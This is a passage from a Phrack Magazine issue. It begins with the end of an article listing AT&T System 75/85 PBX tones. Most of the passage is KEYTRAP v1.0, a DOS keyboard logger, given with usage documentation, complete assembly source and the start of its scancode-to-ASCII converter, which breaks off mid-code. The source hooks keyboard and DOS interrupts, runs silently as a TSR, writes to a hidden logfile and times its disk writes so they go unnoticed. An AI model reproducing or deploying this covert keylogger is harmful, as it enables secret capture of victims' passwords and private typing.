tones the System. Here are the tones, the frequencies, and the moderations.
|
|||
|
|
|||
|
Tone Frequency Pattern
|
|||
|
---- --------- -------
|
|||
|
Answer Back 3 2225 Hz 3000 on
|
|||
|
Answer Back 5 2225 Hz 5000 on
|
|||
|
Bridging Warning 440 Hz 1750 on, 12000 off,
|
|||
|
650 on; repeated
|
|||
|
Busy 480 Hz + 620 Hz 500 on, 500 off; repeated
|
|||
|
Call Waiting
|
|||
|
Internal 440 Hz 200 on
|
|||
|
External 440 Hz 200 on, 200 off
|
|||
|
Attendant 440 Hz 200 on, 200 off
|
|||
|
Priority Call 440 Hz 200 on, 200 off, 200 on,
|
|||
|
200 off, 200 on
|
|||
|
Call Waiting
|
|||
|
Ring Back 440 Hz + 480 Hz; 900 on (440 + 480)
|
|||
|
440 Hz 200 on (440) 2900 off; repeated
|
|||
|
Cnrt Att Call
|
|||
|
Incoming Call
|
|||
|
Identification 480 Hz & 440 Hz 100 on (480), 100 on (440),
|
|||
|
& 480 Hz 100 on silence;
|
|||
|
Dial Zero,
|
|||
|
Attendant Transfer,
|
|||
|
Test Calls, 440 Hz 100 on, 100 off, 100 on
|
|||
|
Coverage 440 Hz 600 on
|
|||
|
Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on,
|
|||
|
100 off, 100 on
|
|||
|
Dial 250 Hz + 400 Hz Continuous
|
|||
|
Executive Override 440 Hz 300 on followed by
|
|||
|
Intercept 440 Hz & 620 Hz 250 on (440),
|
|||
|
250 on (620); repeated
|
|||
|
Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated
|
|||
|
Zip 480 500 on
|
|||
|
|
|||
|
=====
|
|||
|
Outro
|
|||
|
=====
|
|||
|
|
|||
|
System 75/85 (multi-carrier cabinet model) communications system.
|
|||
|
|
|||
|
I hope you learned something, anywayz, questions comments, system login
|
|||
|
information, defaults, where to get manuals, or anything else:
|
|||
|
email me (armitage@dhp.com) and I will get back to you.
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.3a
|
|||
|
|
|||
|
mQCNAi4sHnsAAAEEALjw8E+bOEr1BlCyrBp8f3Ko8yOX5P5uiP+Vor5SamJ33gbu
|
|||
|
PBSBOc+Xww+93Pjl/R7gMC/c/FFtn+ehHsCm5u3AaIXSmx2ZVW2Xen9vXBRMZRB+
|
|||
|
rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9NqW4m70tndGYkB59slAAUT
|
|||
|
tAdFcnVkaXRl
|
|||
|
=Nx+g
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
|
|||
|
erudite (armitage@dhp.com) (armitage on irc) ==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 26 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
KEYTRAP v1.0 - Keyboard Key Logger
|
|||
|
by Dcypher (Dcypher@aol.com)
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------
|
|||
|
THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR
|
|||
|
FOREIGN LAW. THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS
|
|||
|
TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW !
|
|||
|
-------------------------------------------------------------------------
|
|||
|
You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the
|
|||
|
above limitations, and provided all files are included in unmodified
|
|||
|
form; KEYTRAP.EXE, KEYTRAP.DOC
|
|||
|
-------------------------------------------------------------------------
|
|||
|
The author disclaims ALL warranties relating to the program, whether
|
|||
|
express or implied. In absolutely no event shall the author be liable
|
|||
|
for any damage resulting from the use and/or misuse of this program.
|
|||
|
-------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WHAT IS KEYTRAP ?
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
KEYTRAP is a very effective keyboard key logger that will log
|
|||
|
keyboard scancodes to a logfile for later conversion to ASCII
|
|||
|
characters. Keytrap installs as a TSR, remaining in memory
|
|||
|
until the computer is turned off.
|
|||
|
|
|||
|
CONVERT will convert the keyboard scancodes captured by Keytrap
|
|||
|
to their respective keyboard (ASCII) characters.
|
|||
|
|
|||
|
|
|||
|
Usage: KEYTRAP <dir\logfile> /A /B /C
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
A - Maximum size of logfile
|
|||
|
B - Number of keys to log per session
|
|||
|
C - Number of minutes between each session
|
|||
|
|
|||
|
Keytrap is a command line program.
|
|||
|
|
|||
|
<dir\logfile> - You MUST specify a directory for the logfile.
|
|||
|
If you don't specify a directory Keytrap will only look in the
|
|||
|
current directory for the logfile. If the logfile is not found
|
|||
|
in the current directory no writing will occur. Keytrap will
|
|||
|
append the scancode data to the end of the file you specify.
|
|||
|
|
|||
|
A - The Maximum size of the logfile. This number is checked only
|
|||
|
when Keytrap is installed. If the size of the logfile exceeds this
|
|||
|
number, Keytrap will delete the logfile and create a new one.
|
|||
|
|
|||
|
B - This is the number of keys to log per session. Keytrap will
|
|||
|
only check this number AFTER a write to the logfile. So if you
|
|||
|
specify 50 keys, and Keytrap does not get a chance to write till
|
|||
|
there are 100 keys in the buffer, then Keytrap will log 100 keys.
|
|||
|
|
|||
|
C - This is the number of minutes between each session. When Keytrap
|
|||
|
reaches or exceeds the number of keys to log per session, it will
|
|||
|
start a delay routine and check this number. You can't specify more
|
|||
|
then 1440 minutes, the number of minutes in a day !
|
|||
|
|
|||
|
Example: KEYTRAP c:\logfile /20000 /200 /20
|
|||
|
|
|||
|
Keytrap will check "logfile" to see if it exceeds 20,000
|
|||
|
bytes. If it does, Keytrap will delete the log file and then
|
|||
|
create a new one. Keytrap will then install as a TSR program.
|
|||
|
It will log approx 200 keys at a time with a delay of 20 minutes
|
|||
|
between each session.
|
|||
|
|
|||
|
|
|||
|
Usage: CONVERT logfile outfile
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
logfile: The file that contains the scancodes that Keytrap logged.
|
|||
|
outfile: Specify an output file name.
|
|||
|
|
|||
|
Theres not too much to say here. This program just converts scancodes
|
|||
|
from the logfile into their respective keyboard (ASCII) characters.
|
|||
|
|
|||
|
|
|||
|
NOTES
|
|||
|
~~~~~
|
|||
|
Keytrap will not display ANY messages. Check the logfile and
|
|||
|
the size of the logfile if your not sure Keytrap is working.
|
|||
|
|
|||
|
Keytrap will only make the logfile hidden if the logfile is
|
|||
|
actually created by Keytrap or the maximum size of the logfile
|
|||
|
is reached or exceeded. If you specify a file that already
|
|||
|
exists then Keytrap will not change that files attributes and
|
|||
|
will append all scancode data to the end of the file.
|
|||
|
|
|||
|
Keytrap will not crash if the logfile gets deleted while Keytrap
|
|||
|
is in memory. It will just keep looking for the logfile so it can
|
|||
|
write its buffer. A buffer write is not forced until the buffer
|
|||
|
reaches 400 bytes. It will then try to write its buffer during
|
|||
|
the next interrupt 21 call.
|
|||
|
|
|||
|
-------------------------------------------------------------------------
|
|||
|
|
|||
|
If you have any questions or need some help, e-mail me.
|
|||
|
Below is my public pgp key, don't e-mail me without it !
|
|||
|
|
|||
|
Dcypher (Dcypher@aol.com)
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.6
|
|||
|
|
|||
|
mQCNAi3iD5cAAAEEAMVJGdgCYzG5av0lLSjO7iXm64qsuk6v/dx5XcMoNmOHNUA3
|
|||
|
+tzF0WuVPXuJ59mFxE3/rhQqyh8Mci0f4qT6TR7FfSb8vtzSkF5vW8cNUmQx8Qvf
|
|||
|
B/YQZVmztNlWOPROAmT8ZHbsrNev2rgeYjouW3ZOUgA4RKBRYiCTuXD+VOlxAAUR
|
|||
|
tBlEY3lwaGVyIDxEY3lwaGVyQGFvbC5jb20+
|
|||
|
=w2RN
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
;
|
|||
|
;
|
|||
|
; KEYTRAP v1.0 - Keyboard Key Logger
|
|||
|
; By Dcypher (Dcypher@aol.com)
|
|||
|
;
|
|||
|
; Usage: KEYTRAP <dir\logfile> /A /B /C
|
|||
|
;
|
|||
|
; A - Maximum size of log file.
|
|||
|
; B - Number of keys to log per session.
|
|||
|
; C - Minutes between each session.
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
.286 ; 286 or better
|
|||
|
.model small ;
|
|||
|
.code ;
|
|||
|
org 100h ;
|
|||
|
;
|
|||
|
begin: jmp install ;
|
|||
|
;
|
|||
|
;================================================
|
|||
|
;
|
|||
|
db ' DCYPHER@AOL.COM / KEYTRAP V1.0 ' ; PLEASE DON'T REMOVE
|
|||
|
;
|
|||
|
buf db 401 dup (0) ; 400 byte buffer
|
|||
|
bufptr dw 0 ; +1 for luck :)
|
|||
|
;
|
|||
|
hide db 0 ; save int21 function call
|
|||
|
stimem dw 0 ; grab time when done
|
|||
|
handle dw 0 ; logfile handle
|
|||
|
control db 0 ; control which INT to use
|
|||
|
done_flag db 0 ; session done flag
|
|||
|
must_write db 0 ; must-write flag
|
|||
|
write_amount dw 0 ; amount written to disk
|
|||
|
using_21 db 0 ; already doing an int-21
|
|||
|
;
|
|||
|
old_9a_off dw 0 ;
|
|||
|
old_9a_seg dw 0 ;
|
|||
|
;
|
|||
|
old_9b_off dw 0 ;
|
|||
|
old_9b_seg dw 0 ;
|
|||
|
;
|
|||
|
old_21_off dw 0 ;
|
|||
|
old_21_seg dw 0 ;
|
|||
|
;
|
|||
|
datasegm dw 0 ; save data-segment
|
|||
|
;
|
|||
|
delaym dw 0 ; delay, in minutes
|
|||
|
mkeys dw 0 ; maximum number of keys
|
|||
|
logH dw 0 ; log file size
|
|||
|
logL dw 0 ; log file size
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
int_9A: pushf ;
|
|||
|
pusha ;
|
|||
|
push es ;
|
|||
|
push ds ;
|
|||
|
mov ds, datasegm ; we are here
|
|||
|
;
|
|||
|
cmp control, 1 ; use this one ?
|
|||
|
je A91 ;
|
|||
|
call pkey ; process key (scancode)
|
|||
|
;
|
|||
|
A91: pop ds ;
|
|||
|
pop es ;
|
|||
|
popa ;
|
|||
|
popf ;
|
|||
|
jmp dword ptr old_9a_off ;
|
|||
|
;
|
|||
|
;================================================
|
|||
|
;
|
|||
|
pkey: cmp done_flag, 1 ; completely done ?
|
|||
|
je pk2 ;
|
|||
|
cmp bufptr, 400 ; buffer limit reached ?
|
|||
|
jae pk2 ;
|
|||
|
;
|
|||
|
in al, 60h ; get scancode
|
|||
|
;
|
|||
|
cmp al, 39h ; get downstroke and only
|
|||
|
ja pk2 ; as far as spacebar
|
|||
|
cmp al, 2Ah ;
|
|||
|
je pk2 ; no shift
|
|||
|
cmp al, 36h ;
|
|||
|
je pk2 ; no shift
|
|||
|
;
|
|||
|
push 0 ;
|
|||
|
pop es ;
|
|||
|
mov ah, byte ptr es:[417h] ; shift status
|
|||
|
test ah, 43h ; test for both shift keys
|
|||
|
je pk1 ; and cap-lock active
|
|||
|
;
|
|||
|
add al, 80h ; show shift or cap-lock
|
|||
|
pk1: mov di, bufptr ; in logfile
|
|||
|
mov buf[di], al ; place scancode in buffer
|
|||
|
inc di ;
|
|||
|
mov bufptr, di ;
|
|||
|
mov must_write, 1 ; try to write buffer
|
|||
|
;
|
|||
|
pk2: ret ;
|
|||
|
;
|
|||
|
;================================================
|
|||
|
;
|
|||
|
int_9B: pushf ;
|
|||
|
pusha ;
|
|||
|
push es ;
|
|||
|
push ds ;
|
|||
|
mov ds, datasegm ; we are here
|
|||
|
;
|
|||
|
cmp control, 0 ; use this one ?
|
|||
|
je B91 ; (not really needed)
|
|||
|
call pkey ; process a key (scancode)
|
|||
|
;
|
|||
|
B91: pop ds ;
|
|||
|
pop es ;
|
|||
|
popa ;
|
|||
|
popf ;
|
|||
|
jmp dword ptr old_9b_off ;
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
int_21: pushf ;
|
|||
|
pusha ;
|
|||
|
push es ;
|
|||
|
push ds ;
|
|||
|
mov ds, datasegm ; here we are
|
|||
|
;
|
|||
|
cmp ax, 0ffffh ; check if already installed
|
|||
|
je D21 ;
|
|||
|
;
|
|||
|
cmp using_21, 1 ; might need to call an
|
|||
|
je C21 ; int-21 here so jump if
|
|||
|
mov using_21, 1 ; called from below
|
|||
|
mov hide, ah ; save function # for hiding
|
|||
|
;
|
|||
|
call switch ; always control the int 9's
|
|||
|
call timer ; always check restart timer
|
|||
|
;
|
|||
|
cmp done_flag, 1 ; completely done ?
|
|||
|
je B21 ;
|
|||
|
cmp must_write, 1 ; need to write ?
|
|||
|
jne B21 ;
|
|||
|
cmp bufptr, 400 ; push a write when buffer
|
|||
|
jae A21 ; is full
|
|||
|
;
|
|||
|
cmp hide, 3Fh ; disk read
|
|||
|
je A21 ; (hide buffer write)
|
|||
|
cmp hide, 40h ; disk write
|
|||
|
je A21 ;
|
|||
|
jmp B21 ; can't hide, try another time
|
|||
|
;
|
|||
|
A21: call saveb ; write buffer
|
|||
|
;
|
|||
|
B21: mov using_21, 0 ; no int-21 calls anymore
|
|||
|
C21: pop ds ;
|
|||
|
pop es ;
|
|||
|
popa ;
|
|||
|
popf ;
|
|||
|
jmp dword ptr old_21_off ;
|
|||
|
;------------------------------------------------
|
|||
|
D21: pop ds ; already installed !
|
|||
|
pop es ;
|
|||
|
popa ;
|
|||
|
popf ;
|
|||
|
mov ax, 1 ; show installed
|
|||
|
iret ;
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
timer: cmp done_flag, 0 ; only check time when
|
|||
|
je timerb ; session is complete !
|
|||
|
;
|
|||
|
mov ah, 2Ch ;
|
|||
|
int 21h ; what's the time ?
|
|||
|
mov al, ch ;
|
|||
|
xor ah, ah ;
|
|||
|
mov bx, 60 ;
|
|||
|
mul bx ; multiply hours by 60
|
|||
|
xor ch, ch ;
|
|||
|
add ax, cx ; add in the minutes
|
|||
|
;
|
|||
|
mov bx, stimem ;
|
|||
|
cmp ax, bx ; is time now same as
|
|||
|
je timerb ; when session was completed
|
|||
|
; if so, don't do anything
|
|||
|
xor cx, cx ;
|
|||
|
timer1: cmp bx, 1440 ; midnight then back to 0
|
|||
|
jb timer2 ;
|
|||
|
xor bx, bx ;
|
|||
|
timer2: inc cx ; minutes counter
|
|||
|
inc bx ;
|
|||
|
cmp ax, bx ; count until time now
|
|||
|
jne timer1 ;
|
|||
|
;
|
|||
|
cmp cx, delaym ;
|
|||
|
jb timerb ; should we reset ?
|
|||
|
;
|
|||
|
mov done_flag, 0 ; reset / next session
|
|||
|
timerb: ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
switch: mov ax, 3509h ;
|
|||
|
int 21h ;
|
|||
|
cmp bx, offset int_9A ; everything ok with 9A ?
|
|||
|
jne sw1 ; check offset
|
|||
|
mov control, 0 ; show who has control
|
|||
|
ret ;
|
|||
|
;
|
|||
|
sw1: cmp control, 1 ; 9B already in use ?
|
|||
|
je sw2 ; yes, don't do anything
|
|||
|
mov ax, 3509h ;
|
|||
|
int 21h ;
|
|||
|
mov old_9b_seg, es ;
|
|||
|
mov old_9b_off, bx ;
|
|||
|
mov ax, 2509h ;
|
|||
|
lea dx, int_9B ;
|
|||
|
int 21h ; use 9B instead of 9A !
|
|||
|
mov control, 1 ; show who has control
|
|||
|
sw2: ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
saveb: mov ax, 3d01h ;
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ; open logfile, r/w
|
|||
|
jc probw ;
|
|||
|
mov handle, ax ;
|
|||
|
mov bx, ax ;
|
|||
|
mov ax, 4202h ;
|
|||
|
xor cx, cx ;
|
|||
|
xor dx, dx ;
|
|||
|
int 21h ; point to eof
|
|||
|
jc probw ;
|
|||
|
mov ah, 40h ;
|
|||
|
mov bx, handle ;
|
|||
|
mov cx, bufptr ;
|
|||
|
lea dx, buf ;
|
|||
|
int 21h ; write buffer
|
|||
|
jc probw ;
|
|||
|
mov ah, 3Eh ;
|
|||
|
mov bx, handle ;
|
|||
|
int 21h ; close logfile
|
|||
|
jc probw ;
|
|||
|
;------------------------------------------------
|
|||
|
mov cx, bufptr ; no problems writing
|
|||
|
add write_amount, cx ; so add to written amount
|
|||
|
;
|
|||
|
mov cx, mkeys ; check number of keys logged
|
|||
|
cmp write_amount, cx ; all done ?
|
|||
|
jb donew ;
|
|||
|
;
|
|||
|
mov done_flag, 1 ; show session complete
|
|||
|
mov write_amount, 0 ; written amount to 0
|
|||
|
call gtime ; grab stop time [minutes]
|
|||
|
;
|
|||
|
donew: mov must_write, 0 ; no need to write anymore
|
|||
|
mov bufptr, 0 ; buffer pointer back to 0
|
|||
|
probw: ret ; try again another time
|
|||
|
; (if problem writing)
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
gtime: mov ah, 2Ch ; DONE
|
|||
|
int 21h ; grab time in minutes
|
|||
|
mov al, ch ;
|
|||
|
xor ah, ah ;
|
|||
|
mov bx, 60 ;
|
|||
|
mul bx ; multiply hours by 60
|
|||
|
xor ch, ch ;
|
|||
|
add ax, cx ; add in the minutes
|
|||
|
mov stimem, ax ; start time in minutes
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
install:mov bx, 80h ;
|
|||
|
cmp byte ptr [bx], 0 ; any parameters ?
|
|||
|
je bye ;
|
|||
|
;
|
|||
|
mov ax, 0ffffh ;
|
|||
|
int 21h ; already installed ?
|
|||
|
cmp ax, 1 ;
|
|||
|
je bye ;
|
|||
|
;
|
|||
|
call conv ; convert command line numbers
|
|||
|
jc bye ;
|
|||
|
call clog ; check or create logfile
|
|||
|
;
|
|||
|
mov ax, 3509h ;
|
|||
|
int 21h ;
|
|||
|
mov old_9a_off, bx ; save old int 9
|
|||
|
mov old_9a_seg, es ;
|
|||
|
mov ah, 25h ;
|
|||
|
lea dx, int_9A ;
|
|||
|
int 21h ; hook only 9A to start
|
|||
|
;
|
|||
|
mov ax, 3521h ;
|
|||
|
int 21h ;
|
|||
|
mov old_21_off, bx ; save old int 21
|
|||
|
mov old_21_seg, es ;
|
|||
|
mov ah, 25h ;
|
|||
|
lea dx, int_21 ;
|
|||
|
int 21h ; point to new int 21
|
|||
|
;
|
|||
|
mov datasegm, ds ; save this data segment area
|
|||
|
; for later use in the ISR's
|
|||
|
mov bx, offset install ;
|
|||
|
mov ax, 3100h ;
|
|||
|
mov dx, bx ;
|
|||
|
mov cl, 04h ;
|
|||
|
shr dx, cl ;
|
|||
|
inc dx ;
|
|||
|
int 21h ; end / save above install
|
|||
|
;
|
|||
|
bye: mov ah, 4Ch ; no installation
|
|||
|
int 21h ; just end
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
conv: push ds ; convert command line options
|
|||
|
pop es ;
|
|||
|
mov di, 81h ;
|
|||
|
conv1: inc di ;
|
|||
|
cmp byte ptr [di], 2fh ; point to first "/"
|
|||
|
jnz conv1 ;
|
|||
|
inc di ; point to first number
|
|||
|
call mconv ; convert it
|
|||
|
jc conv4 ; any problems ?
|
|||
|
mov logH, dx ;
|
|||
|
mov logL, cx ; save max logfile size
|
|||
|
add cx, dx ;
|
|||
|
cmp cx, 0 ; make sure not 0
|
|||
|
je conv4 ;
|
|||
|
;
|
|||
|
dec di ;
|
|||
|
conv2: inc di ;
|
|||
|
cmp byte ptr [di], 2fh ; point to second "/"
|
|||
|
jnz conv2 ;
|
|||
|
inc di ; point to first number
|
|||
|
call mconv ; convert it
|
|||
|
jc conv4 ; any problems ?
|
|||
|
cmp dx, 0 ; bigger then 65535 ?
|
|||
|
ja conv4 ;
|
|||
|
mov mkeys, cx ; save key limit
|
|||
|
;
|
|||
|
dec di ;
|
|||
|
conv3: inc di ;
|
|||
|
cmp byte ptr [di], 2fh ; point to third "/"
|
|||
|
jnz conv3 ;
|
|||
|
inc di ; point to first number
|
|||
|
call mconv ; convert it
|
|||
|
jc conv4 ; any problems ?
|
|||
|
cmp dx, 0 ;
|
|||
|
ja conv4 ; bigger then 65535 end
|
|||
|
cmp cx, 1440 ;
|
|||
|
ja conv4 ; bigger then 1440 end
|
|||
|
mov delaym, cx ; save session delay time
|
|||
|
clc ; show no problems
|
|||
|
ret ;
|
|||
|
conv4: stc ; show problem
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
mconv: xor cx, cx ; main converter
|
|||
|
mov dx, cx ; no comments here, all I
|
|||
|
mov ah, ch ; know is that it works ! :)
|
|||
|
cld ;
|
|||
|
dec di ;
|
|||
|
convl: inc di ;
|
|||
|
mov al, es:[di] ; convert number at es:[di]
|
|||
|
xor al, '0' ;
|
|||
|
cmp al, 10 ; carry flag will be set
|
|||
|
jae convD ; if theres a problem
|
|||
|
shl cx, 1 ;
|
|||
|
rcl dx, 1 ;
|
|||
|
jc convD ;
|
|||
|
mov bx, cx ;
|
|||
|
mov si, dx ;
|
|||
|
shl cx, 1 ;
|
|||
|
rcl dx, 1 ;
|
|||
|
jc convD ;
|
|||
|
shl cx, 1 ;
|
|||
|
rcl dx, 1 ;
|
|||
|
jc convD ;
|
|||
|
add cx, bx ;
|
|||
|
adc dx, si ;
|
|||
|
jc convD ;
|
|||
|
add cl, al ;
|
|||
|
adc ch, 0 ;
|
|||
|
adc dx, 0 ;
|
|||
|
jc convD ;
|
|||
|
jmp convl ;
|
|||
|
convD: ret ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
clog: mov bx, 82h ; point to logfile
|
|||
|
null1: cmp byte ptr [bx], 20h ; find first space
|
|||
|
je null2 ;
|
|||
|
inc bx ;
|
|||
|
jmp null1 ;
|
|||
|
null2: mov byte ptr [bx], 0 ; replace space with 0
|
|||
|
;
|
|||
|
mov ax, 3D01h ;
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ; open the file
|
|||
|
jc clog3 ;
|
|||
|
mov handle, ax ; good open, save handle
|
|||
|
;
|
|||
|
mov ax, 4202h ;
|
|||
|
mov bx, handle ;
|
|||
|
xor cx, cx ;
|
|||
|
xor dx, dx ;
|
|||
|
int 21h ; mov pointer to eof
|
|||
|
;
|
|||
|
cmp logH, dx ; check size
|
|||
|
ja clog4 ; size ok
|
|||
|
cmp logH, dx ;
|
|||
|
je clog1 ;
|
|||
|
jmp clog2 ; must be below, not ok
|
|||
|
clog1: cmp logL, ax ;
|
|||
|
ja clog4 ; size ok
|
|||
|
;
|
|||
|
clog2: mov ax, 4301h ;
|
|||
|
mov dx, 82h ;
|
|||
|
xor cx, cx ;
|
|||
|
int 21h ; change file mode
|
|||
|
mov ah, 41h ;
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ; delete file
|
|||
|
;
|
|||
|
clog3: mov ah, 3Ch ; create new
|
|||
|
mov cx, 02h ; (hidden)
|
|||
|
mov dx, 82h ;
|
|||
|
int 21h ;
|
|||
|
mov handle, ax ;
|
|||
|
;
|
|||
|
clog4: mov bx, handle ; close logfile handle
|
|||
|
mov ah, 3Eh ;
|
|||
|
int 21h ;
|
|||
|
ret ;
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
|
|||
|
end begin
|
|||
|
|
|||
|
*****************************************************************************
|
|||
|
|
|||
|
;
|
|||
|
;
|
|||
|
; CONVERT v1.0 - Keytrap logfile converter
|
|||
|
; By Dcypher@aol.com
|
|||
|
;
|
|||
|
; Usage: CONVERT logfile outfile
|
|||
|
;
|
|||
|
; logfile - Keytrap's scancode data (logfile)
|
|||
|
; outfile - Specify an output file name
|
|||
|
;
|
|||
|
;
|
|||
|
;----------------------------------------
|
|||
|
;
|
|||
|
.286 ;
|
|||
|
.model small ;
|
|||
|
.code ;
|
|||
|
org 100h ;
|
|||
|
;
|
|||
|
start: jmp go ;
|
|||
|
;
|
|||
|
;----------------------------------------
|
|||
|
;
|
|||
|
inhandle dw 0 ;
|
|||
|
inpointH dw 0 ;
|
|||
|
inpointL dw 0 ;
|
|||
|
loaded dw 0 ;
|
|||
|
last db 0 ;
|
|||
|
;
|
|||
|
outhandle dw 0 ;
|
|||
|
outoffset dw 0 ;
|
|||
|
;
|
|||
|
;----------------------------------------
|
|||
|
;
|
|||
|
table db 002h, '1' ; scan-code table
|
|||
|
db 003h, '2' ;
|
|||
|
db 004h, '3' ;
|
|||
|
db 005h, '4' ;
|
|||
|
db 006h, '5' ;
|
|||
|
db 007h, '6' ;
|
|||
|
db 008h, '7' ;
|
|||
|
db 009h, '8' ;
|
|||
|
db 00Ah, '9' ;
|
|||
|
db 00Bh, '0' ;
|
|||
|
; ;
|
|||
|
db 082h, '!' ;
|
|||
|
db 083h, '@' ;
|
|||
|
db 084h, '#' ;
|
|||
|
db 085h, '$' ;
|
|||
|
db 086h, '%' ;
|
|||
|
db 087h, '^' ;
|
|||
|
db 088h, '&' ;
|
|||
|
db 089h, '*' ;
|
|||
|
db 08Ah, '(' ;
|
|||
|
db 08Bh, ')' ;
|
|||
|
;----------------------------------------
|
|||
|
db 01Eh, 'a' ;
|
|||
|
db 030h, 'b' ;
|
|||
|
db 02Eh, 'c' ;
|
|||
|
db 020h, 'd' ;
|
|||
|
db 012h, 'e' ;
|
|||
|
db 021h, 'f' ;
|
|||
|
db 022h, 'g' ;
|
|||
|
db 023h, 'h' ;
|
|||
|
db 017h, 'i' ;
|
|||
|
db 024h, 'j' ;
|
|||
|
db 025h, 'k' ;
|
|||
|
db 026h, 'l' ;
|
|||
|
db 032h, 'm' ;
|
|||
|
db 031h, 'n' ;
|
|||
|
db 018h, 'o' ;
|
|||
|
db 019h, 'p' ;
|
|||
|
db 010h, 'q' ;
|
|||
|
db 013h, 'r' ;
|
|||
|
db 01Fh, 's' ;
|
|||
|
db 014h, 't' ;
|
|||
|
db 016h, 'u' ;
|
|||
|
db 02Fh, 'v' ;
|
|||
|
db 011h, 'w' ;
|
|||
|
db 02Dh, 'x' ;
|
|||
|
db 015h, 'y' ;
|
|||
|
db 02Ch, 'z' ;
|
|||
|
; ;
|
|||
|
db 09Eh, 'A' ;
|
|||
|
db 0B0h, 'B' ;
|
|||
|
db 0AEh, 'C' ;
|
|||
|
db 0A0h, 'D' ;
|
|||
|
db 092h, 'E' ;
|
|||
|
db 0A1h, 'F' ;
|
|||
|
db 0A2h, 'G' ;
|
|||
|
db 0A3h, 'H' ;
|
|||
|
db 097h, 'I' ;
|
|||
|
db 0A4h, 'J' ;
|
|||
|
db 0A5h, 'K' ;
|
|||
|
db 0A6h, 'L' ;
|
|||
|
db 0B2h, 'M' ;
|
|||
|
db 0B1h, 'N' ;
|
|||
|
db 098h, 'O' ;
|
|||
|
db 099h, 'P' ;
|
|||
|
db 090h, 'Q' ;
|
|||
|
db 093h, 'R' ;
|
|||
|
db 09Fh, 'S' ;
|
|||
|
db 094h, 'T' ;
|
|||
|
db 096h, 'U' ;
|
|||
|
db 0AFh, 'V' ;
|
|||
|
db 091h, 'W' ;
|
|||
|
db 0ADh, 'X' ;
|
|||
|
db 095h, 'Y' ;
|
|||
|
db 0ACh, 'Z' ;
|
|||
|
;----------------------------------------
|
|||
|
db 00Ch, '-' ;
|
|||
|
db 08Ch, '_' ;
|
|||
|
;
|
|||
|
db 00Dh, '=' ;
|
|||
|
db 08Dh, '+' ;
|
|||
|
;
|
|||
|
db 01Ah, '[' ;
|
|||
|
db 09Ah, '{' ;
|
|||
|
;
|
|||
|
db 01Bh, ']' ;
|
|||
|
db 09Bh, '}' ;
|
|||
|
;
|
|||
|
db 027h, ';' ;
|
|||
|
db 0A7h, ':' ;
|
|||
|
;
|
|||
|
db 028h, 027h ; '
|
|||
|
db 0A8h, '"' ;
|
|||
|
;
|
|||
|
db 033h, ',' ;
|
|||
|
db 0B3h, '<' ;
|
|||
|
;
|
|||
|
db 034h, '.' ;
|
|||
|
db 0B4h, '>' ;
|
|||
|
;
|
|||
|
db 035h, '/' ;
|
|||
|
db 0B5h, '?' ;
|
|||
|
;
|
|||
|
db 02Bh, '\' ;
|
|||
|
db 0ABh, '|' ;
|
|||
|
;
|
|||
|
db 037h, '*' ;
|
|||
|
db 0B7h, '*' ;
|
|||
|
;
|
|||
|
db 029h, '`' ;
|
|||
|
db 0A9h, '~' ;
|
|||
|
;
|
|||
|
;----------------------------------------
|
|||
|
;
|
|||
|
db 039h, 020h ; space
|
|||
|
db 0B9h, 020h ; space with shift
|
|||
|
;
|
|||
|
db 00Eh, 011h ; backspace
|
|||
|
db 08Eh, 011h ; backspace with shift
|
|||
|
;
|
|||
|
db 01Ch, 00Ah ; return
|
|||
|
db 09Ch, 00Ah ; return with shift
|
|||
|
;
|
|||
|
db 0 ; End of Table
|
|||
|
;
|
|||
|
;==============================================================================
|
|||
|
;
|
|||
|
fprob: mov ah, 9 ;
|
|||
|
lea dx, ferr ;
|
|||
|
int 21h ;
|
|||
|
jmp bye ;
|
|||
|
;
|
|||
|
prtuse: mov ah, 9 ;
|
|||
|
lea dx, usage ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
bye: mov ah, 4Ch ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
;------------------------------------------------
|
|||
|
;
|
|||
|
go: mov ah, 9 ;
|
|||
|
lea dx, namver ;
|
|||
|
int 21h ;
|
|||
|
;
|
|||
|
mov bx, 80h ;
|
